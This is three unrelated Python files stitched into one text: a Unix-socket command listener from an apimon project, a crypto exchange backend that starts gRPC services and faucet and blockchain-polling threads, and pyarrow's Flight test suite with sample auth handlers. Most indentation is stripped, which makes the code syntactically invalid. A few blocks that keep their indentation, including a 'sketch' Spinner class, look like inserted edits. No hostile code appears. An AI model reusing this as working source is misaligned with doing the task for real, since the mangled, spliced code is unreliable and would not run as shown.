# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
import logging
import os
import socket
import threading
import queue
class CommandSocket(object):
log = logging.getLogger("apimon.CommandSocket")
def __init__(self, path):
self.running = False
self.path = path
self.queue = queue.Queue()
def start(self):
self.running = True
if os.path.exists(self.path):
os.unlink(self.path)
self.socket = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
self.socket.bind(self.path)
self.socket.listen(1)
self.socket_thread = threading.Thread(target=self._socketListener)
self.socket_thread.daemon = True
self.socket_thread.start()
def stop(self):
# First, wake up our listener thread with a connection and
# tell it to stop running.
self.running = False
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
s.connect(self.path)
s.sendall(b'_stop\n')
# The command '_stop' will be ignored by our listener, so
# directly inject it into the queue so that consumers of this
# class which are waiting in .get() are awakened. They can
# either handle '_stop' or just ignore the unknown command and
# then check to see if they should continue to run before
# re-entering their loop.
self.queue.put(b'_stop')
self.socket_thread.join()
self.socket.close()
if os.path.exists(self.path):
os.unlink(self.path)
def _socketListener(self):
while self.running:
try:
s, addr = self.socket.accept()
self.log.debug("Accepted socket connection %s" % (s,))
buf = b''
while True:
buf += s.recv(1)
if buf[-1:] == b'\n':
break
buf = buf.strip()
self.log.debug("Received %s from socket" % (buf,))
s.close()
# Because we use '_stop' internally to wake up a
# waiting thread, don't allow it to actually be
# injected externally.
if buf != b'_stop':
self.queue.put(buf)
except Exception:
self.log.exception("Exception in socket handler")
def get(self):
if not self.running:
raise Exception("CommandSocket.get called while stopped")
return self.queue.get()
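# A minimal usage sketch (the socket path is an assumption): commands are written to
# the unix socket newline-terminated, and consumers read them back through get().
#
#   cs = CommandSocket('/var/run/apimon/command.sock')
#   cs.start()
#   with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
#       s.connect('/var/run/apimon/command.sock')
#       s.sendall(b'pause\n')
#   print(cs.get())    # -> b'pause'
#   cs.stop()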
|
backend.py
|
import json
import logging
import os
import queue
import signal
import socket
import threading
from datetime import timedelta
from types import TracebackType
from typing import Optional, Type
import requests
import sqlalchemy.orm
from common.constants import ADMIN_UUID, CURRENCY_TO_BLOCKCHAIN, Blockchain, Currency
from common.utils.grpc_server import GRPCServer
from common.utils.spinner import Spinner
from common.utils.sqlalchemy_engine import make_sqlalchemy_engine
from sqlalchemy.exc import OperationalError
from backend.config import BackendConfig
from backend.services.account import AccountService
from backend.services.audit_gen.account import AuditGenAccountService
from backend.services.audit_gen.account_delta_group import (
AuditGenAccountDeltaGroupService,
)
from backend.services.audit_gen.audit import AuditGenService
from backend.services.audit_gen.key import AuditGenKeyService
from backend.services.audit_gen.key_account import AuditGenKeyAccountService
from backend.services.audit_gen.key_account_liability import (
AuditGenKeyAccountLiabilityService,
)
from backend.services.audit_gen.key_currency_asset import (
AuditGenKeyCurrencyAssetService,
)
from backend.services.audit_gen.user_cumulative_liability import (
AuditGenUserCumulativeLiabilityService,
)
from backend.services.audit_gen.user_key import AuditGenUserKeyService
from backend.services.auth import AuthService
from backend.services.deposit import DepositService
from backend.services.exchange import ExchangeService
from backend.services.marketdata import MarketdataService
from backend.services.withdrawal import WithdrawalService
from backend.sql.base import Base
from backend.sql.key import Key
from backend.sql.key_currency_account import KeyCurrencyAccount
from backend.utils.blockchain_client.btc import BTCClient
from backend.utils.blockchain_client.client import BlockchainClient
from backend.utils.blockchain_client.eth import ETHClient
from backend.utils.jwt_client import JWTClient
from backend.utils.key_client import KeyClient
from backend.utils.marketdata_client import MarketdataClient
from backend.utils.webauthn_client import WebauthnClient
LOGGER = logging.getLogger(__name__)
SERVICE_NAMES = [
"Account",
"AuditGen",
"AuditGenAccount",
"AuditGenAccountDeltaGroup",
"AuditGenKey",
"AuditGenKeyAccount",
"AuditGenKeyAccountLiability",
"AuditGenKeyCurrencyAsset",
"AuditGenUserCurrencyLiability",
"AuditGenUserKey",
"Auth",
"Depost",
"Exchange",
"Marketdata",
"Withdrawal",
]
class Backend:
def __init__(self, config: BackendConfig) -> None:
self.sqlalchemy_engine = make_sqlalchemy_engine(config.sqlalchemy_config)
Base.metadata.create_all(self.sqlalchemy_engine)
self.sessionmaker = sqlalchemy.orm.sessionmaker(bind=self.sqlalchemy_engine)
self.jwt_client = JWTClient(config.jwt_config)
self.key_client = KeyClient(self.sessionmaker, config.deposit_key_decoy_set_size)
self.eth_client = ETHClient(config.eth_config, self.key_client, self.sessionmaker)
self.btc_client = BTCClient(self.sessionmaker, config.btc_config, self.key_client)
self.blockchain_client = BlockchainClient(self.eth_client, self.btc_client, self.sessionmaker)
self.webauthn_client = WebauthnClient(config.webauthn_config)
self.marketdata_client = MarketdataClient(self.sessionmaker, config.exchange_rate_spread)
self.config = config
self.grpc_server = GRPCServer(config.grpc_server_config)
self.stopped = False
AuthService(self.sessionmaker, self.jwt_client, self.webauthn_client, self.grpc_server.grpc_server)
AccountService(self.sessionmaker, self.jwt_client, self.webauthn_client, self.grpc_server.grpc_server)
DepositService(
self.sessionmaker,
self.jwt_client,
self.key_client,
self.blockchain_client,
config.deposit_faucet_amounts,
self.grpc_server.grpc_server,
)
MarketdataService(
self.sessionmaker,
self.jwt_client,
self.marketdata_client,
self.blockchain_client,
self.grpc_server.grpc_server,
)
ExchangeService(
self.sessionmaker,
self.jwt_client,
self.webauthn_client,
config.account_anonymity_set_size,
self.grpc_server.grpc_server,
)
WithdrawalService(
self.sessionmaker,
self.jwt_client,
self.webauthn_client,
config.account_anonymity_set_size,
self.blockchain_client,
self.key_client,
self.grpc_server.grpc_server,
)
AuditGenAccountDeltaGroupService(
self.sessionmaker, self.jwt_client, self.grpc_server.grpc_server, self.blockchain_client
)
AuditGenAccountService(self.sessionmaker, self.jwt_client, self.grpc_server.grpc_server)
AuditGenService(
self.sessionmaker,
self.jwt_client,
self.grpc_server.grpc_server,
self.blockchain_client,
self.marketdata_client,
)
AuditGenKeyAccountLiabilityService(
self.sessionmaker, self.jwt_client, self.grpc_server.grpc_server, self.blockchain_client, self.key_client
)
AuditGenKeyCurrencyAssetService(
self.sessionmaker, self.jwt_client, self.grpc_server.grpc_server, self.key_client
)
AuditGenKeyAccountService(self.sessionmaker, self.jwt_client, self.grpc_server.grpc_server)
AuditGenKeyService(self.sessionmaker, self.jwt_client, self.grpc_server.grpc_server)
AuditGenUserKeyService(self.sessionmaker, self.jwt_client, self.grpc_server.grpc_server)
AuditGenUserCumulativeLiabilityService(
self.sessionmaker, self.jwt_client, self.grpc_server.grpc_server, self.blockchain_client, self.key_client
)
self.blockchain_processing_threads = [
threading.Thread(target=self.blockchain_processing_loop, kwargs={"blockchain": blockchain})
for blockchain in Blockchain
]
self.marketdata_thread = threading.Thread(target=self.marketdata_loop)
self.faucet_thread = threading.Thread(target=self.faucet_loop)
def faucet_loop(self) -> None:
if self.config.deposit_faucet_amounts is None:
return
# inject the institution with funds so we can create anonymity sets and process withdrawals
# without relying on users to deposit funds or use the faucet
admin_key_uuid = self.key_client.make_new_hot_key()
spinner = Spinner(timedelta(seconds=10)) # only do a deposit once every n seconds to limit inflation haha
with self.sessionmaker() as session:
row_count = (
session.query(KeyCurrencyAccount)
.filter(KeyCurrencyAccount.key_uuid == admin_key_uuid, KeyCurrencyAccount.account_uuid == ADMIN_UUID)
.update(
{
KeyCurrencyAccount.pending_admin_deposits: KeyCurrencyAccount.pending_admin_deposits + 1,
}
)
)
assert row_count == len(Currency), "should have one update per currency"
key = session.query(Key).filter(Key.key_uuid == admin_key_uuid).one()
currency_to_address = {currency: key.get_address(CURRENCY_TO_BLOCKCHAIN[currency]) for currency in Currency}
session.commit()
while not self.stopped:
if not spinner():
continue
try:
for currency, amount in self.config.deposit_faucet_amounts.items():
LOGGER.info("faucet loop -- infusing the institution with %s %s", currency, amount)
address = currency_to_address[currency]
self.blockchain_client.deposit(address, currency, amount)
except (OperationalError, socket.timeout, queue.Empty):
LOGGER.warning("Error in facuet loop, but retrying on next timestamp", exc_info=True)
except: # pylint: disable=bare-except
LOGGER.error("Fatal exception from the facuet loop", exc_info=True)
os.killpg(os.getpgid(os.getpid()), signal.SIGTERM)
def marketdata_loop(self) -> None:
spinner = Spinner(timedelta(seconds=1)) # update the quotes once per second
while not self.stopped:
if not spinner():
continue
try:
self.marketdata_client.update_quotes()
except (json.JSONDecodeError, requests.exceptions.HTTPError, requests.exceptions.ConnectionError):
pass
except: # pylint: disable=bare-except
LOGGER.error("Fatal exception from the marketdata loop", exc_info=True)
os.killpg(os.getpgid(os.getpid()), signal.SIGTERM)
def blockchain_processing_loop(self, blockchain: Blockchain) -> None:
spinner = Spinner(timedelta(seconds=1)) # check once per second
while not self.stopped:
if not spinner():
continue
try:
latest_processed_block_number = self.blockchain_client.get_latest_processed_block_number(blockchain)
if latest_processed_block_number is None:
block_to_process = self.blockchain_client.get_start_block_number(blockchain)
else:
block_to_process = latest_processed_block_number + 1
latest_blockchain_block_number = self.blockchain_client.get_latest_block_number_from_chain(blockchain)
LOGGER.info("latest_blockchain_block_number for %s is %d", blockchain, latest_blockchain_block_number)
if block_to_process <= latest_blockchain_block_number and (not self.stopped):
LOGGER.info("Processing block(%d) on blockchain(%s)", block_to_process, blockchain)
self.blockchain_client.process_block(blockchain, block_to_process)
LOGGER.info("Finished processing block(%d) on blockchain(%s)", block_to_process, blockchain)
block_to_process += 1
            except (OperationalError, socket.timeout, queue.Empty, requests.exceptions.ConnectionError):
                # OperationalError's are skipped since they represent db errors outside our control,
                # like failed transactions or locks; it's fine, we'll just process this block on the next tick
                LOGGER.warning(
                    "Error processing block on blockchain(%s), but retrying on next tick",
                    blockchain,
                    exc_info=True,
                )
            except: # pylint: disable=bare-except
                LOGGER.error(
                    "Fatal exception from the blockchain processing loop for blockchain(%s)", blockchain, exc_info=True
                )
                os.killpg(os.getpgid(os.getpid()), signal.SIGTERM)
def start(self) -> None:
LOGGER.info("Starting the faucet thread")
self.faucet_thread.start()
LOGGER.info("Starting the marketdata thread")
self.marketdata_thread.start()
LOGGER.info("Starting the blockchain processing threads")
for thread in self.blockchain_processing_threads:
thread.start()
LOGGER.info("Starting the grpc server")
self.grpc_server.start()
LOGGER.info("Backend started")
def __enter__(self) -> "Backend":
self.start()
return self
def stop(self) -> None:
self.stopped = True
LOGGER.info("Stopping the grpc server")
self.grpc_server.stop()
LOGGER.info("Joining the blockchian processing threads")
for thread in self.blockchain_processing_threads:
thread.join()
LOGGER.info("Joining the marketdata thread to stop")
self.marketdata_thread.join()
LOGGER.info("Joining the faucet thread")
self.faucet_thread.join()
def __exit__(
self,
exc_type: Optional[Type[BaseException]],
exc_value: Optional[BaseException],
traceback: Optional[TracebackType],
) -> None:
self.stop()
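# The loops above assume a `Spinner` helper (imported elsewhere in this module) whose
# __call__() returns True at most once per configured interval, so each loop does real
# work once per tick and otherwise idles. A minimal illustrative sketch of such a
# rate limiter, under that assumption (not the actual implementation), might be:
import time as _time  # imported here only to keep this illustrative sketch self-contained
class _SpinnerSketch:
    def __init__(self, interval: timedelta) -> None:
        self._interval = interval.total_seconds()
        self._next_fire = _time.monotonic()
    def __call__(self) -> bool:
        # Fire (return True) once the interval has elapsed; otherwise sleep briefly so
        # callers can poll in a tight while-loop without busy-waiting.
        now = _time.monotonic()
        if now >= self._next_fire:
            self._next_fire = now + self._interval
            return True
        _time.sleep(0.05)
        return False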
|
test_flight.py
|
# -*- coding: utf-8 -*-
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import base64
import os
import struct
import tempfile
import threading
import time
import traceback
import pytest
import pyarrow as pa
from pyarrow.compat import tobytes
from pyarrow.util import pathlib, find_free_port
try:
from pyarrow import flight
from pyarrow.flight import (
FlightClient, FlightServerBase,
ServerAuthHandler, ClientAuthHandler,
ServerMiddleware, ServerMiddlewareFactory,
ClientMiddleware, ClientMiddlewareFactory,
)
except ImportError:
flight = None
FlightClient, FlightServerBase = object, object
ServerAuthHandler, ClientAuthHandler = object, object
ServerMiddleware, ServerMiddlewareFactory = object, object
ClientMiddleware, ClientMiddlewareFactory = object, object
# Marks all of the tests in this module
# Ignore these with pytest ... -m 'not flight'
pytestmark = pytest.mark.flight
def test_import():
# So we see the ImportError somewhere
import pyarrow.flight # noqa
def resource_root():
"""Get the path to the test resources directory."""
if not os.environ.get("ARROW_TEST_DATA"):
raise RuntimeError("Test resources not found; set "
"ARROW_TEST_DATA to <repo root>/testing")
return pathlib.Path(os.environ["ARROW_TEST_DATA"]) / "flight"
def read_flight_resource(path):
"""Get the contents of a test resource file."""
root = resource_root()
if not root:
return None
try:
with (root / path).open("rb") as f:
return f.read()
except FileNotFoundError:
raise RuntimeError(
"Test resource {} not found; did you initialize the "
"test resource submodule?\n{}".format(root / path,
traceback.format_exc()))
def example_tls_certs():
"""Get the paths to test TLS certificates."""
return {
"root_cert": read_flight_resource("root-ca.pem"),
"certificates": [
flight.CertKeyPair(
cert=read_flight_resource("cert0.pem"),
key=read_flight_resource("cert0.key"),
),
flight.CertKeyPair(
cert=read_flight_resource("cert1.pem"),
key=read_flight_resource("cert1.key"),
),
]
}
def simple_ints_table():
data = [
pa.array([-10, -5, 0, 5, 10])
]
return pa.Table.from_arrays(data, names=['some_ints'])
def simple_dicts_table():
dict_values = pa.array(["foo", "baz", "quux"], type=pa.utf8())
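    # The index arrays below reference dict_values, so the two chunks decode to
    # ['baz', 'foo', None] and ['quux', 'baz'] respectively.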
data = [
pa.chunked_array([
pa.DictionaryArray.from_arrays([1, 0, None], dict_values),
pa.DictionaryArray.from_arrays([2, 1], dict_values)
])
]
return pa.Table.from_arrays(data, names=['some_dicts'])
class ConstantFlightServer(FlightServerBase):
"""A Flight server that always returns the same data.
See ARROW-4796: this server implementation will segfault if Flight
does not properly hold a reference to the Table object.
"""
def __init__(self, location=None, **kwargs):
super(ConstantFlightServer, self).__init__(location, **kwargs)
# Ticket -> Table
self.table_factories = {
b'ints': simple_ints_table,
b'dicts': simple_dicts_table,
}
def do_get(self, context, ticket):
# Return a fresh table, so that Flight is the only one keeping a
# reference.
table = self.table_factories[ticket.ticket]()
return flight.RecordBatchStream(table)
class MetadataFlightServer(FlightServerBase):
"""A Flight server that numbers incoming/outgoing data."""
def do_get(self, context, ticket):
data = [
pa.array([-10, -5, 0, 5, 10])
]
table = pa.Table.from_arrays(data, names=['a'])
return flight.GeneratorStream(
table.schema,
self.number_batches(table))
def do_put(self, context, descriptor, reader, writer):
counter = 0
expected_data = [-10, -5, 0, 5, 10]
while True:
try:
batch, buf = reader.read_chunk()
assert batch.equals(pa.RecordBatch.from_arrays(
[pa.array([expected_data[counter]])],
['a']
))
assert buf is not None
client_counter, = struct.unpack('<i', buf.to_pybytes())
assert counter == client_counter
writer.write(struct.pack('<i', counter))
counter += 1
except StopIteration:
return
@staticmethod
def number_batches(table):
for idx, batch in enumerate(table.to_batches()):
buf = struct.pack('<i', idx)
yield batch, buf
class EchoFlightServer(FlightServerBase):
"""A Flight server that returns the last data uploaded."""
def __init__(self, location=None, expected_schema=None, **kwargs):
super(EchoFlightServer, self).__init__(location, **kwargs)
self.last_message = None
self.expected_schema = expected_schema
def do_get(self, context, ticket):
return flight.RecordBatchStream(self.last_message)
def do_put(self, context, descriptor, reader, writer):
if self.expected_schema:
assert self.expected_schema == reader.schema
self.last_message = reader.read_all()
class EchoStreamFlightServer(EchoFlightServer):
"""An echo server that streams individual record batches."""
def do_get(self, context, ticket):
return flight.GeneratorStream(
self.last_message.schema,
self.last_message.to_batches(max_chunksize=1024))
def list_actions(self, context):
return []
def do_action(self, context, action):
if action.type == "who-am-i":
return iter([flight.Result(context.peer_identity())])
raise NotImplementedError
class GetInfoFlightServer(FlightServerBase):
"""A Flight server that tests GetFlightInfo."""
def get_flight_info(self, context, descriptor):
return flight.FlightInfo(
pa.schema([('a', pa.int32())]),
descriptor,
[
flight.FlightEndpoint(b'', ['grpc://test']),
flight.FlightEndpoint(
b'',
[flight.Location.for_grpc_tcp('localhost', 5005)],
),
],
-1,
-1,
)
def get_schema(self, context, descriptor):
info = self.get_flight_info(context, descriptor)
return flight.SchemaResult(info.schema)
class ListActionsFlightServer(FlightServerBase):
"""A Flight server that tests ListActions."""
@classmethod
def expected_actions(cls):
return [
("action-1", "description"),
("action-2", ""),
flight.ActionType("action-3", "more detail"),
]
def list_actions(self, context):
for action in self.expected_actions():
yield action
class ListActionsErrorFlightServer(FlightServerBase):
"""A Flight server that tests ListActions."""
def list_actions(self, context):
yield ("action-1", "")
yield "foo"
class CheckTicketFlightServer(FlightServerBase):
"""A Flight server that compares the given ticket to an expected value."""
def __init__(self, expected_ticket, location=None, **kwargs):
super(CheckTicketFlightServer, self).__init__(location, **kwargs)
self.expected_ticket = expected_ticket
def do_get(self, context, ticket):
assert self.expected_ticket == ticket.ticket
data1 = [pa.array([-10, -5, 0, 5, 10], type=pa.int32())]
table = pa.Table.from_arrays(data1, names=['a'])
return flight.RecordBatchStream(table)
    def do_put(self, context, descriptor, reader, writer):
self.last_message = reader.read_all()
class InvalidStreamFlightServer(FlightServerBase):
"""A Flight server that tries to return messages with differing schemas."""
schema = pa.schema([('a', pa.int32())])
def do_get(self, context, ticket):
data1 = [pa.array([-10, -5, 0, 5, 10], type=pa.int32())]
data2 = [pa.array([-10.0, -5.0, 0.0, 5.0, 10.0], type=pa.float64())]
        assert data1[0].type != data2[0].type
table1 = pa.Table.from_arrays(data1, names=['a'])
table2 = pa.Table.from_arrays(data2, names=['a'])
assert table1.schema == self.schema
return flight.GeneratorStream(self.schema, [table1, table2])
class SlowFlightServer(FlightServerBase):
"""A Flight server that delays its responses to test timeouts."""
def do_get(self, context, ticket):
return flight.GeneratorStream(pa.schema([('a', pa.int32())]),
self.slow_stream())
def do_action(self, context, action):
time.sleep(0.5)
return iter([])
@staticmethod
def slow_stream():
data1 = [pa.array([-10, -5, 0, 5, 10], type=pa.int32())]
yield pa.Table.from_arrays(data1, names=['a'])
# The second message should never get sent; the client should
# cancel before we send this
time.sleep(10)
yield pa.Table.from_arrays(data1, names=['a'])
class ErrorFlightServer(FlightServerBase):
"""A Flight server that uses all the Flight-specific errors."""
def do_action(self, context, action):
if action.type == "internal":
raise flight.FlightInternalError("foo")
elif action.type == "timedout":
raise flight.FlightTimedOutError("foo")
elif action.type == "cancel":
raise flight.FlightCancelledError("foo")
elif action.type == "unauthenticated":
raise flight.FlightUnauthenticatedError("foo")
elif action.type == "unauthorized":
raise flight.FlightUnauthorizedError("foo")
raise NotImplementedError
def list_flights(self, context, criteria):
yield flight.FlightInfo(
pa.schema([]),
flight.FlightDescriptor.for_path('/foo'),
[],
-1, -1
)
raise flight.FlightInternalError("foo")
class HttpBasicServerAuthHandler(ServerAuthHandler):
"""An example implementation of HTTP basic authentication."""
def __init__(self, creds):
super(HttpBasicServerAuthHandler, self).__init__()
self.creds = creds
def authenticate(self, outgoing, incoming):
buf = incoming.read()
auth = flight.BasicAuth.deserialize(buf)
if auth.username not in self.creds:
raise flight.FlightUnauthenticatedError("unknown user")
if self.creds[auth.username] != auth.password:
raise flight.FlightUnauthenticatedError("wrong password")
outgoing.write(tobytes(auth.username))
def is_valid(self, token):
if not token:
raise flight.FlightUnauthenticatedError("token not provided")
if token not in self.creds:
raise flight.FlightUnauthenticatedError("unknown user")
return token
class HttpBasicClientAuthHandler(ClientAuthHandler):
"""An example implementation of HTTP basic authentication."""
def __init__(self, username, password):
super(HttpBasicClientAuthHandler, self).__init__()
self.basic_auth = flight.BasicAuth(username, password)
self.token = None
def authenticate(self, outgoing, incoming):
auth = self.basic_auth.serialize()
outgoing.write(auth)
self.token = incoming.read()
def get_token(self):
return self.token
class TokenServerAuthHandler(ServerAuthHandler):
"""An example implementation of authentication via handshake."""
def __init__(self, creds):
super(TokenServerAuthHandler, self).__init__()
self.creds = creds
def authenticate(self, outgoing, incoming):
username = incoming.read()
password = incoming.read()
if username in self.creds and self.creds[username] == password:
outgoing.write(base64.b64encode(b'secret:' + username))
else:
raise flight.FlightUnauthenticatedError(
"invalid username/password")
def is_valid(self, token):
token = base64.b64decode(token)
if not token.startswith(b'secret:'):
raise flight.FlightUnauthenticatedError("invalid token")
return token[7:]
class TokenClientAuthHandler(ClientAuthHandler):
"""An example implementation of authentication via handshake."""
def __init__(self, username, password):
super(TokenClientAuthHandler, self).__init__()
self.username = username
self.password = password
self.token = b''
def authenticate(self, outgoing, incoming):
outgoing.write(self.username)
outgoing.write(self.password)
self.token = incoming.read()
def get_token(self):
return self.token
class HeaderServerMiddleware(ServerMiddleware):
"""Expose a per-call value to the RPC method body."""
def __init__(self, special_value):
self.special_value = special_value
class HeaderServerMiddlewareFactory(ServerMiddlewareFactory):
"""Expose a per-call hard-coded value to the RPC method body."""
def start_call(self, info, headers):
return HeaderServerMiddleware("right value")
class HeaderFlightServer(FlightServerBase):
"""Echo back the per-call hard-coded value."""
def do_action(self, context, action):
middleware = context.get_middleware("test")
if middleware:
return iter([flight.Result(middleware.special_value.encode())])
return iter([flight.Result("".encode())])
class SelectiveAuthServerMiddlewareFactory(ServerMiddlewareFactory):
"""Deny access to certain methods based on a header."""
def start_call(self, info, headers):
if info.method == flight.FlightMethod.LIST_ACTIONS:
# No auth needed
return
token = headers.get("x-auth-token")
if not token:
raise flight.FlightUnauthenticatedError("No token")
token = token[0]
if token != "password":
raise flight.FlightUnauthenticatedError("Invalid token")
return HeaderServerMiddleware(token)
class SelectiveAuthClientMiddlewareFactory(ClientMiddlewareFactory):
def start_call(self, info):
return SelectiveAuthClientMiddleware()
class SelectiveAuthClientMiddleware(ClientMiddleware):
def sending_headers(self):
return {
"x-auth-token": "password",
}
def test_flight_server_location_argument():
locations = [
None,
'grpc://localhost:0',
('localhost', find_free_port()),
]
for location in locations:
with FlightServerBase(location) as server:
assert isinstance(server, FlightServerBase)
def test_server_exit_reraises_exception():
with pytest.raises(ValueError):
with FlightServerBase():
raise ValueError()
@pytest.mark.slow
def test_client_wait_for_available():
location = ('localhost', find_free_port())
server = None
def serve():
global server
time.sleep(0.5)
server = FlightServerBase(location)
server.serve()
client = FlightClient(location)
thread = threading.Thread(target=serve, daemon=True)
thread.start()
started = time.time()
client.wait_for_available(timeout=5)
elapsed = time.time() - started
assert elapsed >= 0.5
def test_flight_do_get_ints():
"""Try a simple do_get call."""
table = simple_ints_table()
with ConstantFlightServer() as server:
client = flight.connect(('localhost', server.port))
data = client.do_get(flight.Ticket(b'ints')).read_all()
assert data.equals(table)
@pytest.mark.pandas
def test_do_get_ints_pandas():
"""Try a simple do_get call."""
table = simple_ints_table()
with ConstantFlightServer() as server:
client = flight.connect(('localhost', server.port))
data = client.do_get(flight.Ticket(b'ints')).read_pandas()
assert list(data['some_ints']) == table.column(0).to_pylist()
def test_flight_do_get_dicts():
table = simple_dicts_table()
with ConstantFlightServer() as server:
client = flight.connect(('localhost', server.port))
data = client.do_get(flight.Ticket(b'dicts')).read_all()
assert data.equals(table)
def test_flight_do_get_ticket():
"""Make sure Tickets get passed to the server."""
data1 = [pa.array([-10, -5, 0, 5, 10], type=pa.int32())]
table = pa.Table.from_arrays(data1, names=['a'])
with CheckTicketFlightServer(expected_ticket=b'the-ticket') as server:
client = flight.connect(('localhost', server.port))
data = client.do_get(flight.Ticket(b'the-ticket')).read_all()
assert data.equals(table)
def test_flight_get_info():
"""Make sure FlightEndpoint accepts string and object URIs."""
with GetInfoFlightServer() as server:
client = FlightClient(('localhost', server.port))
info = client.get_flight_info(flight.FlightDescriptor.for_command(b''))
assert info.total_records == -1
assert info.total_bytes == -1
assert info.schema == pa.schema([('a', pa.int32())])
assert len(info.endpoints) == 2
assert len(info.endpoints[0].locations) == 1
assert info.endpoints[0].locations[0] == flight.Location('grpc://test')
assert info.endpoints[1].locations[0] == \
flight.Location.for_grpc_tcp('localhost', 5005)
def test_flight_get_schema():
"""Make sure GetSchema returns correct schema."""
with GetInfoFlightServer() as server:
client = FlightClient(('localhost', server.port))
info = client.get_schema(flight.FlightDescriptor.for_command(b''))
assert info.schema == pa.schema([('a', pa.int32())])
def test_list_actions():
"""Make sure the return type of ListActions is validated."""
# ARROW-6392
with ListActionsErrorFlightServer() as server:
client = FlightClient(('localhost', server.port))
with pytest.raises(pa.ArrowException, match=".*unknown error.*"):
list(client.list_actions())
with ListActionsFlightServer() as server:
client = FlightClient(('localhost', server.port))
assert list(client.list_actions()) == \
ListActionsFlightServer.expected_actions()
def test_get_port():
"""Make sure port() works."""
server = GetInfoFlightServer("grpc://localhost:0")
try:
assert server.port > 0
finally:
server.shutdown()
@pytest.mark.skipif(os.name == 'nt',
reason="Unix sockets can't be tested on Windows")
def test_flight_domain_socket():
"""Try a simple do_get call over a Unix domain socket."""
with tempfile.NamedTemporaryFile() as sock:
sock.close()
location = flight.Location.for_grpc_unix(sock.name)
with ConstantFlightServer(location=location):
client = FlightClient(location)
reader = client.do_get(flight.Ticket(b'ints'))
table = simple_ints_table()
assert reader.schema.equals(table.schema)
data = reader.read_all()
assert data.equals(table)
reader = client.do_get(flight.Ticket(b'dicts'))
table = simple_dicts_table()
assert reader.schema.equals(table.schema)
data = reader.read_all()
assert data.equals(table)
@pytest.mark.slow
def test_flight_large_message():
"""Try sending/receiving a large message via Flight.
See ARROW-4421: by default, gRPC won't allow us to send messages >
4MiB in size.
"""
data = pa.Table.from_arrays([
pa.array(range(0, 10 * 1024 * 1024))
], names=['a'])
with EchoFlightServer(expected_schema=data.schema) as server:
client = FlightClient(('localhost', server.port))
writer, _ = client.do_put(flight.FlightDescriptor.for_path('test'),
data.schema)
# Write a single giant chunk
writer.write_table(data, 10 * 1024 * 1024)
writer.close()
result = client.do_get(flight.Ticket(b'')).read_all()
assert result.equals(data)
def test_flight_generator_stream():
"""Try downloading a flight of RecordBatches in a GeneratorStream."""
data = pa.Table.from_arrays([
pa.array(range(0, 10 * 1024))
], names=['a'])
with EchoStreamFlightServer() as server:
client = FlightClient(('localhost', server.port))
writer, _ = client.do_put(flight.FlightDescriptor.for_path('test'),
data.schema)
writer.write_table(data)
writer.close()
result = client.do_get(flight.Ticket(b'')).read_all()
assert result.equals(data)
def test_flight_invalid_generator_stream():
"""Try streaming data with mismatched schemas."""
with InvalidStreamFlightServer() as server:
client = FlightClient(('localhost', server.port))
with pytest.raises(pa.ArrowException):
client.do_get(flight.Ticket(b'')).read_all()
def test_timeout_fires():
"""Make sure timeouts fire on slow requests."""
# Do this in a separate thread so that if it fails, we don't hang
# the entire test process
with SlowFlightServer() as server:
client = FlightClient(('localhost', server.port))
action = flight.Action("", b"")
options = flight.FlightCallOptions(timeout=0.2)
# gRPC error messages change based on version, so don't look
# for a particular error
with pytest.raises(flight.FlightTimedOutError):
list(client.do_action(action, options=options))
def test_timeout_passes():
"""Make sure timeouts do not fire on fast requests."""
with ConstantFlightServer() as server:
client = FlightClient(('localhost', server.port))
options = flight.FlightCallOptions(timeout=5.0)
client.do_get(flight.Ticket(b'ints'), options=options).read_all()
basic_auth_handler = HttpBasicServerAuthHandler(creds={
b"test": b"p4ssw0rd",
})
token_auth_handler = TokenServerAuthHandler(creds={
b"test": b"p4ssw0rd",
})
@pytest.mark.slow
def test_http_basic_unauth():
"""Test that auth fails when not authenticated."""
with EchoStreamFlightServer(auth_handler=basic_auth_handler) as server:
client = FlightClient(('localhost', server.port))
action = flight.Action("who-am-i", b"")
with pytest.raises(flight.FlightUnauthenticatedError,
match=".*unauthenticated.*"):
list(client.do_action(action))
def test_http_basic_auth():
"""Test a Python implementation of HTTP basic authentication."""
with EchoStreamFlightServer(auth_handler=basic_auth_handler) as server:
client = FlightClient(('localhost', server.port))
action = flight.Action("who-am-i", b"")
client.authenticate(HttpBasicClientAuthHandler('test', 'p4ssw0rd'))
identity = next(client.do_action(action))
assert identity.body.to_pybytes() == b'test'
def test_http_basic_auth_invalid_password():
"""Test that auth fails with the wrong password."""
with EchoStreamFlightServer(auth_handler=basic_auth_handler) as server:
client = FlightClient(('localhost', server.port))
action = flight.Action("who-am-i", b"")
with pytest.raises(flight.FlightUnauthenticatedError,
match=".*wrong password.*"):
client.authenticate(HttpBasicClientAuthHandler('test', 'wrong'))
next(client.do_action(action))
def test_token_auth():
"""Test an auth mechanism that uses a handshake."""
with EchoStreamFlightServer(auth_handler=token_auth_handler) as server:
client = FlightClient(('localhost', server.port))
action = flight.Action("who-am-i", b"")
client.authenticate(TokenClientAuthHandler('test', 'p4ssw0rd'))
identity = next(client.do_action(action))
assert identity.body.to_pybytes() == b'test'
def test_token_auth_invalid():
"""Test an auth mechanism that uses a handshake."""
with EchoStreamFlightServer(auth_handler=token_auth_handler) as server:
client = FlightClient(('localhost', server.port))
with pytest.raises(flight.FlightUnauthenticatedError):
client.authenticate(TokenClientAuthHandler('test', 'wrong'))
def test_location_invalid():
"""Test constructing invalid URIs."""
with pytest.raises(pa.ArrowInvalid, match=".*Cannot parse URI:.*"):
flight.connect("%")
with pytest.raises(pa.ArrowInvalid, match=".*Cannot parse URI:.*"):
ConstantFlightServer("%")
